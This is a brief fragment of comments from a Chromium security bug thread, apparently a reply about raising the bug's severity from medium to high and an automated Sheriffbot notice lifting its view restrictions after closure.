,
May 14 2018
Hi loobenyang@ - thanks for asking. We did indeed take this into account, I'm afraid (that was one of the reasons we raised it from medium to high in comment 27). Cheers!
,
Jul 31
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot